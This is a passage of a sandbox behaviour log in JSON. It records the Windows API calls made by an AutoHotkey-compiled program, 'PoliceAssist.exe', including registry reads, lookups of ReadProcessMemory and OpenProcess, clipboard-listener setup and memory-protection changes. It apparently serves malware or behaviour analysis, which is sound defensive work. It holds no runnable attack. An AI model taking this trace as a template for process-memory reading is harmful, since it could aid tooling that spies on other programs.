"pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 85 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 86 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000244" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000240" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize" } ], "repeated": 0, "id": 87 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000244" }, { "name": "ValueName", "value": "AppsUseLightTheme" }, { "name": "Data", "value": "1" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme" } ], "repeated": 0, "id": 88 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000244" } ], "repeated": 0, "id": 89 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000240" } ], "repeated": 0, "id": 90 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000244" } ], "repeated": 0, "id": 91 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 92 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000244" } ], "repeated": 0, "id": 93 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "OleDropTargetInterface" }, { "name": "Atom", "value": "0x0000c01e" } ], "repeated": 0, "id": 94 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "OleDropTargetMarshalHwnd" }, { "name": "Atom", "value": "0x0000c01f" } ], "repeated": 0, "id": 95 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001bba4", "parentcaller": "0x1400cad9c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" } ], "repeated": 0, "id": 96 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001bbb4", "parentcaller": "0x1400cad9c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" }, { "name": "FunctionName", "value": "RtlGetVersion" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34ae4e0" } ], "repeated": 0, "id": 97 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400df2b1", "parentcaller": "0x1400cad9c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "user32" }, { "name": "ModuleHandle", "value": "0x7ffee1f70000" } ], "repeated": 0, "id": 98 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400df2c1", "parentcaller": "0x1400cad9c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1f70000" }, { "name": "FunctionName", "value": "RemoveClipboardFormatListener" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee1f9cef0" } ], "repeated": 0, "id": 99 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400df2e1", "parentcaller": "0x1400cad9c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "user32" }, { "name": "ModuleHandle", "value": "0x7ffee1f70000" } ], "repeated": 0, "id": 100 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400df2f1", "parentcaller": "0x1400cad9c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1f70000" }, { "name": "FunctionName", "value": "AddClipboardFormatListener" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee1f9cf10" } ], "repeated": 0, "id": 101 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400ae373", "parentcaller": "0x1400ae49c", "category": "filesystem", "api": "FindFirstFileExW", "status": true, "return": "0x008ad200", "arguments": [ { "name": "FileName", "value": "C:\\Temp" }, { "name": "FirstCreateTimeLow", "value": "0x0c174eca" }, { "name": "FirstCreateTimeHigh", "value": "0x01dc598a" } ], "repeated": 0, "id": 102 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400ae387", "parentcaller": "0x1400ae49c", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000244" } ], "repeated": 0, "id": 103 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400ae3ef", "parentcaller": "0x1400ae49c", "category": "filesystem", "api": "FindFirstFileExW", "status": true, "return": "0x008acf60", "arguments": [ { "name": "FileName", "value": "C:\\Temp\\PoliceAssist.exe" }, { "name": "FirstCreateTimeLow", "value": "0xbdb88d69" }, { "name": "FirstCreateTimeHigh", "value": "0x01dc59a8" } ], "repeated": 0, "id": 104 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400ae402", "parentcaller": "0x1400ae49c", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000244" } ], "repeated": 0, "id": 105 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x140020820", "parentcaller": "0x1400201a7", "category": "misc", "api": "FindResourceExW", "status": true, "return": "0x1401313b0", "arguments": [ { "name": "Module", "value": "0x00000000" }, { "name": "Type", "value": "#10" }, { "name": "Name", "value": ">AUTOHOTKEY SCRIPT<" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 106 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x140020837", "parentcaller": "0x1400201a7", "category": "misc", "api": "SizeofResource", "status": true, "return": "0x0000301f", "arguments": [ { "name": "ModuleHandle", "value": "0x00000000" }, { "name": "ResourceInfo", "value": "0x1401313b0" } ], "repeated": 0, "id": 107 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14002084e", "parentcaller": "0x1400201a7", "category": "misc", "api": "LoadResource", "status": true, "return": "0x140136168", "arguments": [ { "name": "Module", "value": "0x00000000" }, { "name": "ResourceInfo", "value": "0x1401313b0" } ], "repeated": 0, "id": 108 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400aa8e0", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x054c7000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 109 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400111be", "parentcaller": "0x140010c92", "category": "misc", "api": "GetKeyboardLayout", "status": true, "return": "0x04090409", "arguments": [ { "name": "KeyboardLayout", "value": "0x00000409" }, { "name": "LanguageName", "value": "English (United States)" } ], "repeated": 12, "id": 110 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400aa4ba", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05362000" }, { "name": "RegionSize", "value": "0x00011000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 111 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbba6", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x054ca000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 112 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14006bd5a", "parentcaller": "0x1400317fe", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "user32" }, { "name": "ModuleHandle", "value": "0x7ffee1f70000" } ], "repeated": 0, "id": 113 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14006bd6e", "parentcaller": "0x1400317fe", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32" }, { "name": "ModuleHandle", "value": "0x7ffee1660000" } ], "repeated": 0, "id": 114 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14006bd82", "parentcaller": "0x1400317fe", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "comctl32" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" } ], "repeated": 0, "id": 115 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14006bd96", "parentcaller": "0x1400317fe", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "gdi32" }, { "name": "ModuleHandle", "value": "0x7ffee1850000" } ], "repeated": 0, "id": 116 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14006be38", "parentcaller": "0x1400317fe", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": false, "return": "0xffffffffc0000139", "pretty_return": "ENTRYPOINT_NOT_FOUND", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1f70000" }, { "name": "FunctionName", "value": "ReadProcessMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x00000000" } ], "repeated": 0, "id": 117 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14006be38", "parentcaller": "0x1400317fe", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x7ffee1660000" }, { "name": "FunctionName", "value": "ReadProcessMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee167c800" } ], "repeated": 0, "id": 118 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14006be38", "parentcaller": "0x1400317fe", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": false, "return": "0xffffffffc0000139", "pretty_return": "ENTRYPOINT_NOT_FOUND", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1f70000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x00000000" } ], "repeated": 0, "id": 119 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14006be38", "parentcaller": "0x1400317fe", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x7ffee1660000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee1684bf0" } ], "repeated": 0, "id": 120 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14006be38", "parentcaller": "0x1400317fe", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": false, "return": "0xffffffffc0000139", "pretty_return": "ENTRYPOINT_NOT_FOUND", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1f70000" }, { "name": "FunctionName", "value": "OpenProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x00000000" } ], "repeated": 0, "id": 121 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14006be38", "parentcaller": "0x1400317fe", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x7ffee1660000" }, { "name": "FunctionName", "value": "OpenProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee167b0f0" } ], "repeated": 0, "id": 122 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x140020668", "parentcaller": "0x1400053b0", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 123 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x140005722", "parentcaller": "0x1400053c5", "category": "windows", "api": "FindWindowW", "status": false, "return": "0x00000000", "arguments": [ { "name": "ClassName", "value": "AutoHotkey" }, { "name": "WindowName", "value": "C:\\Temp\\PoliceAssist.exe" } ], "repeated": 0, "id": 124 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af45e", "parentcaller": "0x14001f01c", "category": "misc", "api": "FindResourceExW", "status": true, "return": "0x1401313c0", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "Type", "value": "#14" }, { "name": "Name", "value": "#159" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 125 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af473", "parentcaller": "0x14001f01c", "category": "misc", "api": "LoadResource", "status": true, "return": "0x140139188", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "ResourceInfo", "value": "0x1401313c0" } ], "repeated": 0, "id": 126 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af51b", "parentcaller": "0x14001f01c", "category": "misc", "api": "FindResourceExW", "status": true, "return": "0x140131320", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "Type", "value": "#3" }, { "name": "Name", "value": "#2" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 127 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af52f", "parentcaller": "0x14001f01c", "category": "misc", "api": "LoadResource", "status": true, "return": "0x140132500", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "ResourceInfo", "value": "0x140131320" } ], "repeated": 0, "id": 128 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af551", "parentcaller": "0x14001f01c", "category": "misc", "api": "SizeofResource", "status": true, "return": "0x000025a8", "arguments": [ { "name": "ModuleHandle", "value": "0x140000000" }, { "name": "ResourceInfo", "value": "0x140131320" } ], "repeated": 0, "id": 129 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af574", "parentcaller": "0x14001f01c", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 130 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af574", "parentcaller": "0x14001f01c", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 131 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af574", "parentcaller": "0x14001f01c", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 132 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af574", "parentcaller": "0x14001f01c", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 133 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af574", "parentcaller": "0x14001f01c", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 134 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af574", "parentcaller": "0x14001f01c", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 135 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af574", "parentcaller": "0x14001f01c", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 136 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af574", "parentcaller": "0x14001f01c", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 137 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af574", "parentcaller": "0x14001f01c", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1879000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 138 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af574", "parentcaller": "0x14001f01c", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1879000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 139 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af45e", "parentcaller": "0x14001f045", "category": "misc", "api": "FindResourceExW", "status": true, "return": "0x1401313c0", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "Type", "value": "#14" }, { "name": "Name", "value": "#159" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 140 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af473", "parentcaller": "0x14001f045", "category": "misc", "api": "LoadResource", "status": true, "return": "0x140139188", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "ResourceInfo", "value": "0x1401313c0" } ], "repeated": 0, "id": 141 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af51b", "parentcaller": "0x14001f045", "category": "misc", "api": "FindResourceExW", "status": true, "return": "0x140131310", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "Type", "value": "#3" }, { "name": "Name", "value": "#1" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 142 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af52f", "parentcaller": "0x14001f045", "category": "misc", "api": "LoadResource", "status": true, "return": "0x140131458", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "ResourceInfo", "value": "0x140131310" } ], "repeated": 0, "id": 143 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x1400af551", "parentcaller": "0x14001f045", "category": "misc", "api": "SizeofResource", "status": true, "return": "0x000010a8", "arguments": [ { "name": "ModuleHandle", "value": "0x140000000" }, { "name": "ResourceInfo", "value": "0x140131310" } ], "repeated": 0, "id": 144 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "misc", "api": "FindResourceExW", "status": true, "return": "0x140131380", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "Type", "value": "#4" }, { "name": "Name", "value": "#211" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 145 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "misc", "api": "LoadResource", "status": true, "return": "0x140135d70", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "ResourceInfo", "value": "0x140131380" } ], "repeated": 0, "id": 146 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "93" }, { "name": "ProcessInformation", "value": "\\x7f7\\x9e}" } ], "repeated": 0, "id": 147 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000244" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "MSCTF.dll" } ], "repeated": 0, "id": 148 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000244" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee21a0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00114000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 149 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee22b0000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", 